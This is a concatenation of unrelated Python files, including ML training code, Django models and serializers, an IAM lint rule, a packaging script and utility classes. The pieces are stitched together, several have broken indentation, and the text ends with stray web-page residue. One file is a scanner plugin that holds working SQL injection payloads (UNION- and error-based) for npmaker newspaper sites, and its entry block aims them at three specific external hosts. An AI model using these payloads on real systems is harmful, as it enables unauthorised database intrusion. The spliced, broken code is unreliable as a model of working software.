    @abc.abstractmethod
    def _run(self):
        """Method to be called to run continuously in its own thread

        Devices should not return from this method unless the intent is for the
        device to stop retrieving data. Data can be gathered by either polling
        or using events / wait if the external system supports to do so.
        Timers may also be used, please be sure to honor:
        CONF.devices.minimal_polling_delay
        """

    def run(self):
        """Entry point for devices to initialize and start running

        Serves as the entry point for devices and calls _init and _run. In
        addition handles any required state transitions

        Any exception encountered will be raised so DeviceManager can handle it
        appropriately.
        """
        # Fixed: the two branch annotations below were bare string literals,
        # i.e. no-op expression statements; they are now real comments.
        if self._statemachine.get_state() is DeviceStates.ERROR:
            # Recover device from error state
            LOG.info(_("Restarting {} device of implementation {} from "
                       "previous error state.")
                     .format(self.info.name, self.info.implementation))
            self._statemachine.reset_state()
        elif self._statemachine.get_state() is not DeviceStates.STOPPED:
            # Not logging a message here, DeviceManager can easily do that
            raise RuntimeError(_("Can not start same device {} multiple times")
                               .format(self.info.name))
        try:
            self._statemachine.transition(DeviceStates.INITIALIZING)
            self._init()
        except Exception:
            self._statemachine.transition(DeviceStates.ERROR)
            raise
        try:
            self._statemachine.transition(DeviceStates.RUNNING)
            self._run()
        except Exception:
            self._statemachine.transition(DeviceStates.ERROR)
            raise
        # A clean return from _run() means the device stopped normally.
        if self._statemachine.get_state() is DeviceStates.RUNNING:
            self._statemachine.transition(DeviceStates.STOPPED)

    @abc.abstractmethod
    def stop(self):
        """Method when called that should halt operation of device asap

        Halting can be achieved by setting a variable and checking this
        variable inside a loop in the _run method. Other methods include using
        conditions to notify the _run method.
        """

    @abc.abstractmethod
    def is_stopping(self):
        """Should return true if in the progress of stopping false otherwise

        :return: True if stopping, false otherwise
        """

    def get_state(self):
        """Return the current statemachine state"""
        return self._statemachine.get_state()

    def has_data(self):
        """Wrapper around internal buffer"""
        return self.data.has_readings()

    def get_data(self):
        """Return a collection of radiation monitoring data if any is available

        Retrieves the currently stored collection of radiation monitoring data
        and subsequently clears it.

        :return: Collection of RadiationReading objects
        :rtype: List of :py:class: '~.RadiationReading' instances
        """
        got_data = self.data.fetch_clear_readings()
        if got_data:
            return got_data
        else:
            LOG.error(_("Unable to retrieve data for: %s") % self.NAME)
            return []
|
#!/usr/bin/env python
"""Packaging script for McComplex.

Uses setuptools.setup directly: the original imported the deprecated
distutils.core.setup (PEP 632) and relied on the side effect of importing
setuptools, even though ``install_requires`` is a setuptools keyword.
"""
from setuptools import setup

setup(name='McComplex',
      version='1.0',
      description="""This program reconstructs macrocomplexes of protein-protein
and protein-(DNA/RNA) from a list of files of binary interactions of its chains""",
      author='Maria Lucía Romero, Ferran Pegenaute, Ipek Yaren',
      author_email='ferran.pegenaute01@estudiant.upf.edu',
      long_description=open('README.md').read(),
      install_requires=['biopython >= 1.73.0', 'argparse >= 1.1.0', 'pysimplelog'],
      packages=['McComplex', 'McComplex.functions'],
      license='LICENSE.txt',
      url='https://github.com/ferranpgp/McCrocomplex')
|
# encoding: utf-8
'''
@author: xupengfei
'''
from row_factory import keyed_tuple_factory
from utils import LoggingMixin
class BaseDumper(LoggingMixin):
    """Base class for dumpers: holds handler factories and a row factory."""

    # Default row-shaping callable; staticmethod() keeps the plain function
    # from being bound as an instance method on attribute access.
    _row_factory = staticmethod(keyed_tuple_factory)

    def __init__(self, handler_factories, *args, **kwargs):
        self.handler_factories = handler_factories
        self.handlers = None

    @property
    def row_factory(self):
        """Callable applied to each fetched row."""
        return self._row_factory

    @row_factory.setter
    def row_factory(self, factory):
        self._row_factory = factory

    def create_handlers(self, **kwargs):
        """Instantiate one handler per registered factory and return them."""
        created = []
        for factory in self.handler_factories:
            created.append(factory.create_handler(**kwargs))
        return created
|
import os
import time
import argparse
import numpy as np
import torch
import torch.nn as nn
from utils import sample_once, collate_fn, evaluate, random_baseline
from sklearn.metrics import roc_auc_score
from constants import *
from datasets.random_task_dataset import RandomTaskDataset
from models.lstm_selector import LSTMSelector
from models.predictor import meanPred
def train_model(train_ld, val_ld, predictor, selector, save_path, num_epochs, lr, k):
    """Train the selector model.

    Uses a policy-gradient (REINFORCE-style) update: the selector samples k
    pool indices, the frozen predictor is evaluated on the query set, and
    -(reward * log_prob) is minimized, where reward is the AUROC advantage
    over a random-selection baseline. Checkpoints are saved whenever the
    meta-val AUROC improves.

    Args:
        train_ld (dataloader): dataloader for the meta-train set
        val_ld (dataloader): dataloader for the meta-val set
        predictor (nn.Module): the predictor module
        selector (nn.Module): the trainable selector module
        save_path (string): path to save checkpoints
        num_epochs (int): number of epochs
        lr (float): learning rate
        k (int): number of X-rays to select from pool
    """
    optimizer = torch.optim.Adam(selector.parameters(), lr=lr)
    device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
    selector = selector.to(device)
    selector.train()
    # Feature slice fed to the selector; indices 512-514 presumably carry the
    # extra ASL features when USE_ASL is set -- TODO confirm against dataset.
    ssidx = 0
    seidx = 515 if USE_ASL else 512 # End Index of Pool for Selector
    begin_time = time.time()
    report_examples = 0
    report_reward = 0
    best_metric = None
    print('begin selector training K=%d' % k)
    for epoch in range(num_epochs):
        if epoch == 2: #multiply learning rate by 0.1
            for g in optimizer.param_groups:
                g['lr'] = g['lr'] * 0.1
        #auroc = evaluate(val_ld, selector, predictor, device, k)
        #print("Meta-val average AUROC: %.4f" % auroc)
        for i, data in enumerate(train_ld):
            optimizer.zero_grad()
            pool = data['pool'].numpy()
            pool_labels = data['pool_labels'].numpy()
            data['pool'] = data['pool'].to(device)
            logits = selector(data['pool'][:,:,ssidx:seidx])
            idx, log_prob = sample_once(logits, k) #(batch_size, k)
            # Gather the sampled pool rows / labels per batch element.
            selected = []
            selected_labels = []
            for p in range(len(idx)):
                selected.append(pool[p][idx[p]])
                selected_labels.append(pool_labels[p][idx[p]])
            selected = torch.Tensor(np.array(selected))
            selected_labels = torch.LongTensor(np.array(selected_labels))
            # Only the first 512 features go to the predictor (ASL extras excluded).
            preds = predictor.forward_selected(selected[:,:,:512], selected_labels, data['query'][:,:,:512], data['query_labels'])
            preds = preds.squeeze(dim=2) #(batch_size, query_set_size)
            # Per-task AUROC on the query set is the raw reward signal.
            res = np.array([0]*data['query_labels'].shape[0]).astype(float) #(batch_size,)
            for p in range(data['query_labels'].shape[0]):
                res[p] = roc_auc_score(data['query_labels'][p,:],preds[p,:])
            main_reward = torch.Tensor(res)
            baseline_reward = random_baseline(data, predictor, k)
            reward = main_reward - baseline_reward #(batch_size,)
            reward = reward.to(device)
            # REINFORCE loss: negative advantage-weighted log-likelihood.
            final = -(reward * log_prob) #(batch_size,)
            final = torch.mean(final)
            final.backward()
            optimizer.step()
            report_reward += main_reward.mean()
            report_examples += 1
            if (i+1) % 5 == 0:
                print('epoch %d, iter %d, avg_reward %.3f, time_elapsed %.3f sec' % (epoch+1, i+1,
                                                                                     report_reward/report_examples,
                                                                                     time.time() - begin_time))
                report_reward = 0.0
                report_examples = 0
            if (i+1) % 30 == 0:
                # Periodic meta-val evaluation; checkpoint only on improvement.
                auroc, _ = evaluate(val_ld, selector, predictor, device, k, return_avg=True)
                print("Meta-val average AUROC: %.4f" % auroc)
                if best_metric is None or auroc > best_metric: #new best network
                    print("saving new best network!\n")
                    best_metric = auroc
                    path = os.path.join(save_path, "model_epoch%d_iter%d" % (epoch+1, i+1))
                    torch.save({'epoch': epoch+1,
                                'model_state_dict': selector.state_dict(),
                                'optimizer_state_dict': optimizer.state_dict()},
                               path)
def load_data(positive_csv_path, normal_csv_path, num_tasks, num_workers=4, deterministic=True):
    """Build a dataloader of randomly sampled tasks from X-ray csv data.

    Args:
        positive_csv_path (string): path to csv containing data for X-ray images that are positive
            for abnormalities
        normal_csv_path (string): path to csv containing data for X-ray images that are labeled
            positive for "No Finding", meaning they are normal
        num_tasks (int): number of tasks to sample for this dataset
        num_workers (int): number of worker threads to load the data
        deterministic (bool): whether the tasks in a dataset are sampled deterministically. If
            deterministic, the tasks used are the same across different epochs

    Returns:
        torch.utils.data.DataLoader: dataloader for the given data
    """
    # Pool/query sizes and class fractions come from module-level constants.
    task_dataset = RandomTaskDataset(
        positive_csv_path=positive_csv_path,
        normal_csv_path=normal_csv_path,
        unlabeled_pool_size=UNLABELED_POOL_SIZE,
        unlabeled_pos_frac=UNLABELED_POS_FRAC,
        query_set_size=QUERY_SET_SIZE,
        query_pos_frac=QUERY_POS_FRAC,
        conditions_used=NON_HOLD_OUT,
        num_tasks=num_tasks,
        deterministic=deterministic,
        use_asl=USE_ASL,
    )
    return torch.utils.data.DataLoader(
        dataset=task_dataset,
        batch_size=BATCH_SIZE,
        collate_fn=collate_fn,
        num_workers=num_workers,
    )
def train_helper(train_ld, val_ld, save_path):
    """Execute MedSelect training with the module-level hyperparameters.

    Args:
        train_ld (torch.utils.data.DataLoader): dataloader for train data
        val_ld (torch.utils.data.DataLoader): dataloader for test data
        save_path (string): directory in which checkpoints will be saved
    """
    # Cosine-similarity mean predictor stays fixed; only the LSTM selector
    # is trained. Input width grows by 3 when ASL features are enabled.
    predictor = meanPred(mode='cosine')
    selector = LSTMSelector(input_size=512 + USE_ASL * 3)
    print("\n\nRunning for K=%d" % K)
    train_model(
        train_ld=train_ld,
        val_ld=val_ld,
        predictor=predictor,
        selector=selector,
        save_path=save_path,
        num_epochs=NUM_EPOCHS,
        lr=LEARNING_RATE,
        k=K,
    )
if __name__ == '__main__':
    # Command-line entry point: parse csv paths and checkpoint directory,
    # build the two dataloaders, then run training.
    parser = argparse.ArgumentParser(description='Train a MedSelect model.')
    parser.add_argument('--train_pos_csv', type=str, nargs='?', required=True,
                        help='Path to training set csv containing data for X-rays that are positive for abnormalities')
    parser.add_argument('--train_norm_csv', type=str, nargs='?', required=True,
                        help='Path to training set csv containing data for X-rays that are positive for No Finding')
    parser.add_argument('--val_pos_csv', type=str, nargs='?', required=True,
                        help='Path to val set csv containing data for X-rays that are positive for abnormalities')
    parser.add_argument('--val_norm_csv', type=str, nargs='?', required=True,
                        help='Path to val set csv containing data for X-rays that are positive for No Finding')
    parser.add_argument('--out', type=str, nargs='?', required=True,
                        help='Path to directory in which checkpoints will be saved')
    cli = parser.parse_args()

    meta_train_ld = load_data(cli.train_pos_csv, cli.train_norm_csv, NUM_META_TRAIN_TASKS)
    meta_val_ld = load_data(cli.val_pos_csv, cli.val_norm_csv, NUM_META_TEST_TASKS)
    train_helper(meta_train_ld, meta_val_ld, cli.out)
|
#!/usr/bin/evn python
#-*-:coding:utf-8 -*-
#Author:404
#Name:npmaker数字报漏洞集
#Refer:http://www.2cto.com/Article/201307/231014.html
def assign(service, arg):
    """Claim the "xplus" service for this plugin.

    Returns (True, arg) when the service matches; otherwise falls through
    and implicitly yields None, exactly like the scanner framework expects.
    """
    if service != "xplus":
        return None
    return True, arg
def audit(arg):
    """Probe an npmaker (xplus) site for SQL injection.

    ``curl`` and ``security_hole`` are expected to be module globals,
    presumably injected by ``from dummy import *`` in the __main__ block
    -- TODO confirm against the scanner framework.
    """
    # MySQL: UNION-based injection; md5(1) echoes the digest of "1"
    # ('c4ca4238a0b923820dcc509a6f75849b') in the page when vulnerable.
    url=arg+"www/index.php?mod=admin&con=deliver&act=view&username=809763517&deliId=-32%20UNION%20SELECT%201,md5(1),3,4,5,6,7,8,9,10,11,12,13--"
    code,head,res,errcode,_=curl.curl2(url)
    if code==200 and 'c4ca4238a0b923820dcc509a6f75849b' in res:
        security_hole("mysql: "+url)
    else:
        # MSSQL: error-based probe; the concatenated char() marker plus
        # @@version leaks 'GAOJIMicrosoft' into the response when injectable.
        url=arg+"www/index.php?mod=index&con=Review&act=getallpaper&papertype=scrb%27%20and%20char(71)%252Bchar(65)%252Bchar(79)%252Bchar(74)%252Bchar(73)%252B@@version%3E0--"
        code,head,res,errcode,_=curl.curl2(url)
        if code==200 and 'GAOJIMicrosoft' in res:
            security_hole("mssql: "+url)
if __name__=="__main__":
from dummy import *
audit(assign('xplus','http://paper.fynews.net/')[1])
audit(assign('xplus','http://news.xd56b.com/')[1])
audit(assign('xplus','http://epaper.xsmd.com.cn/')[1]) |
from __future__ import absolute_import, division, print_function
import sys
import inspect
from builtins import (str)
from cloudformation_validator.custom_rules.BaseRule import BaseRule
def lineno():
    """Return a rule-tagged suffix naming the caller and its line number."""
    caller = inspect.currentframe().f_back
    return (' - IamManagedPolicyNotResourceRule - caller: '
            + caller.f_code.co_name
            + ' - line number: '
            + str(caller.f_lineno))
class IamManagedPolicyNotResourceRule(BaseRule):
    """Warns when an IAM managed policy combines Allow with NotResource."""
    def __init__(self, cfn_model=None, debug=None):
        """
        Initialize IamManagedPolicyNotResourceRule
        :param cfn_model: parsed CloudFormation model to audit
        :param debug: when truthy, print trace output
        """
        BaseRule.__init__(self, cfn_model, debug=debug)
    def rule_text(self):
        """
        Returns rule text
        :return: human-readable description of the violation
        """
        return 'IAM managed policy should not allow Allow+NotResource'
    def rule_type(self):
        """
        Returns rule type (warning-level severity)
        :return: the type string, also cached on self.type
        """
        self.type= 'VIOLATION::WARNING'
        return 'VIOLATION::WARNING'
    def rule_id(self):
        """
        Returns rule id
        :return: the id string, also cached on self.id
        """
        if self.debug:
            print('rule_id'+lineno())
        self.id ='W23'
        return 'W23'
    def audit_impl(self):
        """
        Audit all AWS::IAM::ManagedPolicy resources in the model
        :return: violations - logical ids of policies whose policy document
            allows an Allow+NotResource statement
        """
        if self.debug:
            print('IamManagedPolicyNotResourceRule - audit_impl'+lineno())
        violating_policies = []
        resources = self.cfn_model.resources_by_type('AWS::IAM::ManagedPolicy')
        if len(resources)>0:
            for resource in resources:
                if self.debug:
                    print('resource: '+str(resource))
                if hasattr(resource,'policy_document'):
                    if self.debug:
                        print('has policy document '+lineno())
                        print('policy document: '+str(resource.policy_document)+lineno())
                    if resource.policy_document:
                        # allows_not_resource() flags the Allow+NotResource
                        # combination this rule exists to catch.
                        if resource.policy_document.allows_not_resource():
                            if self.debug:
                                print('has allows not resource')
                            violating_policies.append(str(resource.logical_resource_id))
                else:
                    if self.debug:
                        print('does not have policy document'+lineno())
        else:
            # No managed policies at all: nothing can violate.
            if self.debug:
                print('no violating_policies' + lineno())
        return violating_policies
#!/usr/bin/python3
#https://practice.geeksforgeeks.org/problems/first-non-repeating-character-in-a-stream/0
import queue
def sol(arr, n):
    """Print the first non-repeating character of the stream after each char.

    After every character of *arr*, prints (space-separated) the first
    character seen so far that occurs exactly once, or -1 if none exists.

    A count table tracks occurrences while a FIFO queue holds candidate
    characters in arrival order. The cached answer ``res`` is only
    re-derived (by popping stale, repeated entries from the queue) when the
    current answer is invalidated, i.e. it just repeated or was -1.

    Args:
        arr: sequence of characters (a string here); may be empty
        n: upper bound for the queue size (len(arr))
    """
    # Guard: the original crashed on arr[0] for empty input.
    if not arr:
        print()
        return
    q = queue.Queue(maxsize=n)
    cnt = {}
    res = arr[0]
    for char in arr:
        # Invalidate the cached answer if its character just repeated,
        # or if there was no answer at all.
        if res == char or res == -1:
            res = False
        if char in cnt:
            cnt[char]+=1
        else:
            cnt[char] = 1
        q.put(char)
        if not res:
            found = False
            # Pop until a still-unique character surfaces; popped repeated
            # characters can never become unique again, so dropping them is safe.
            while not q.empty():
                res = q.get()
                if cnt[res] == 1:
                    found = True
                    break
            if not found:
                res = -1
        print(res, end=" ")
    print()
arr="w l r b b m q b h c d a r z o w k k y h i d d q s c d x r\
j m o w f r x s j y b l d b e f s a r c b y n e c d y g g x x p\
k l o r e l l n m p a p q f w k h o p k m c o q h n w n k u e w h\
s q m g b b u q c l j j i v s w m d k q t b x i x m v t r r b l\
j p t n s n f w z q f j m a f a d r r w s o f s b c n u v q h f\
f b s a q x w p q c a c e h c h z v f r k m l n o z j k p q p x\
r j x k i t z y x a c b h h k i c q c o e n d t o m f g d w d w\
f c g p x i q v k u y t d l c g d e w h t a c i o h o r d t q k v w c s g s p q o q m s b o a g u w n n y q x n z l g d g w"
sol(arr, len(arr)) |
def _add_element(base, index, value):
"""Implementation of += on an array element"""
try:
base[index] += value
except TypeError:
if isinstance(value, int) or isinstance(value, float):
base[index] = _num(base[index]) + value
elif value is None:
base[index] = _num(base[index])
else:
base[index] = _num(base[index]) + _num(value)
return base[index]
|
import uuid
from django.contrib.auth import get_user_model # new
from django.db import models
from django.urls import reverse
class Book(models.Model):
    """A book for sale, keyed by a random UUID."""
    # UUID primary key avoids exposing sequential integer ids in URLs. # new
    id = models.UUIDField( # new
        primary_key=True,
        default=uuid.uuid4,
        editable=False)
    title = models.CharField(max_length=200)
    author = models.CharField(max_length=200)
    # max_digits=6 / decimal_places=2 caps prices at 9999.99.
    price = models.DecimalField(max_digits=6, decimal_places=2)
    def __str__(self):
        """Human-readable label used by the admin and shell."""
        return self.title
    def get_absolute_url(self): # new
        """Canonical URL of this book's detail page."""
        return reverse('book_detail', args=[str(self.id)])
class Review(models.Model): # new
    """A short user review attached to a Book."""
    # Deleting a book cascades to its reviews; reverse accessor is
    # book.reviews.
    book = models.ForeignKey(
        Book,
        on_delete=models.CASCADE,
        related_name='reviews',
    )
    review = models.CharField(max_length=255)
    # get_user_model() resolves the project's active user model.
    author = models.ForeignKey(
        get_user_model(),
        on_delete=models.CASCADE,
    )
    def __str__(self):
        """Show the review text itself."""
        return self.review
|
from .ucsc_base import load_ucsc_exons
# Collection name presumably used by the loader framework when storing
# these documents -- TODO confirm against the framework's conventions.
__metadata__ = {
    '__collection__': 'ucsc_exons',
}
def load_genedoc(self=None):
    """Fetch the UCSC exon documents (delegates to load_ucsc_exons)."""
    return load_ucsc_exons()
def get_mapping(self=None):
    """Return the index mapping for this collection.

    Every exon payload is stored but deliberately not indexed
    ("enabled": False), since the exon blobs are only ever retrieved whole.
    """
    unindexed_object = {"type": "object", "enabled": False}
    return {
        field: dict(unindexed_object)
        for field in ("exons", "exons_hg19", "exons_mm9")
    }
|
from django.contrib.auth import get_user_model
from message_app.models import Message
from rest_framework import serializers
from support_app.tasks import send_new_message_email
from ticket_app.models import Ticket
class CustomUserSerializer(serializers.ModelSerializer):
    '''Serializer for a user: exposes only id, username and email.'''
    class Meta:
        model = get_user_model()
        fields = ['id', 'username', 'email']
# NOTE(review): class name carries a doubled "r" (Serializerr); renaming
# would break subclasses and importers, so it is left as-is.
class AbstractTicketSerializerr(serializers.ModelSerializer):
    '''Base ticket serializer: nested read-only author, all model fields
    exposed, core fields immutable.'''
    author = CustomUserSerializer(read_only=True)
    class Meta:
        model = Ticket
        fields = ('__all__')
        read_only_fields = ['title', 'text', 'author', 'created_at']
class SupportTicketUpdateStatusSerializer(AbstractTicketSerializerr):
    '''Serializer a support agent uses to update the status of a ticket;
    inherits all behavior from its base unchanged.'''
    pass
class SupportMessageCreateSerializer(serializers.ModelSerializer):
    '''Serializer a support agent uses to create messages in any ticket.'''

    author = CustomUserSerializer(read_only=True)

    class Meta:
        model = Message
        fields = '__all__'
        read_only_fields = ['created_at']

    def validate(self, data):
        """Reject replies whose parent message lives in a different ticket."""
        parent_message = data.get('parent')
        if parent_message and parent_message.ticket != data.get('ticket'):
            raise serializers.ValidationError('Child message must be in the same ticket as parent message!')
        return data

    def create(self, validated_data):
        """Create the message and notify the ticket author by email."""
        ticket = Ticket.objects.get(pk=validated_data.get('ticket').id)
        if ticket.author.email:
            send_new_message_email.delay(ticket.author.email, ticket.title, validated_data.get('text'))
        return super().create(validated_data)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.